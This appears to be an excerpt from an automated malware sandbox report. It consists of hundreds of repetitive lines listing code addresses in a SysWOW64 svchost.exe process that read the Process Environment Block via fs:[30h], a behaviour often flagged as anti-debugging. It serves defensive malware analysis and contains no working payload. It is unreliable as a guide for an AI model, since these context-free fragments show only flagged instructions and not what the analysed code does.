                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]2_2_03304B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]2_2_03228B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]2_2_03304940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
